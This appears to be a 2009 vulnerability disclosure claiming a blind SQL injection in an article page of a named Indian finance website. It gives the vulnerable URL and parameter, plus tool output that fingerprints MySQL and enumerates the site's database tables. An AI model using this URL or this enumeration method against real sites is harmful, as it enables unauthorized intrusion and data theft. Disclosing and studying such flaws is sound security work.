============================================================================= Website: http://moneycontrol.com/ Category: India's one of the biggest finance screener [stock market ] Vulnerability: Blind SQL Injection Founder: Jaydeep Dave [jaydipdave@gmail.com] Date: 16th Feb, 2009 ============================================================================= == P O C ==================================================================== [+] URL: http://wealth.moneycontrol.com/article.php?id=9791 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found! [+] Showing Tables from database "bsmart" [+] Number of Tables: 96 [0]: admin_action_log [1]: askexpert [2]: author [3]: authorsource [4]: authortype [5]: autoloan [6]: bankfdsfinal [7]: blogcomments [8]: blogcontent [9]: blograting [10]: blogreadtrack [11]: blogusers [12]: boxmanagement [13]: calculators [14]: chat [15]: cmslog [16]: cobrandedcard [17]: commentfilters [18]: comments [19]: communitiescategory .... =============================================================================